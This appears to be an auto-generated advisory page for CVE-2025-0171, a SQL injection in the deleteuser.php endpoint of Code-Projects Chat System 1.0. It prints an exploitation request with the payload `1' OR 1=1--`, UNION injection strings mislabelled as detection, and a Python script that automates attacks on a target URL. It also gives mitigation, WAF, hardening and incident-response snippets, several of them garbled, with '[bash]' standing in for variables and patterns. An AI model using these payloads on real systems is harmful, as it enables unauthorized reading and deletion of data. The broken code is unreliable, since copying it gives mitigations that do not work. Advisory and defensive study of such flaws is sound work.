The vulnerability (CVE-2025-0171) in Code-Projects Chat System 1.0 allows remote attackers to execute arbitrary SQL queries via the `id` parameter in /admin/deleteuser.php. The application fails to sanitize user-supplied input before concatenating it into SQL statements, enabling classic SQL injection. Attackers can manipulate the `id` parameter to inject malicious SQL payloads, potentially leading to unauthorized data access, modification, or deletion. The flaw stems from insecure direct object reference (IDOR) combined with improper input validation.
DailyCVE Form:
Platform: Code-Projects Chat
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 04/03/2025
What Undercode Say:
Exploitation:
POST /admin/deleteuser.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded id=1' OR 1=1--
Detection (SQLi Payloads):
1' UNION SELECT 1,2,3,4-- 1' AND (SELECT 1 FROM users WHERE username='admin')--
Mitigation:
// Use prepared statements
$stmt = $conn->prepare("DELETE FROM users WHERE id = ?");
$stmt->bind_param("i", $_POST[bash]);
$stmt->execute();
Log Analysis (WAF/IDS):
grep "deleteuser.php.id=.[bash]" /var/log/apache2/access.log
Patch Verification:
curl -X POST -d "id=1'" http://target.com/admin/deleteuser.php | grep "SQL syntax"
Exploit Automation (Python):
import requests
payloads = [bash]
for payload in payloads:
r = requests.post("http://target.com/admin/deleteuser.php", data={"id": payload})
if "error" in r.text:
print(f"Vulnerable to: {payload}")
Protection (.htaccess):
RewriteCond %{QUERY_STRING} [bash]
RewriteRule ^admin/deleteuser.php - [bash]
Database Hardening:
REVOKE DELETE ON users FROM 'chat_app'@'localhost';
Incident Response:
Isolate affected system iptables -A INPUT -p tcp --dport 80 -j DROP Backup logs tar -czvf /var/log/chat_incident.tar.gz /var/log/apache2/
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-0171
Extra Source Hub:
Undercode
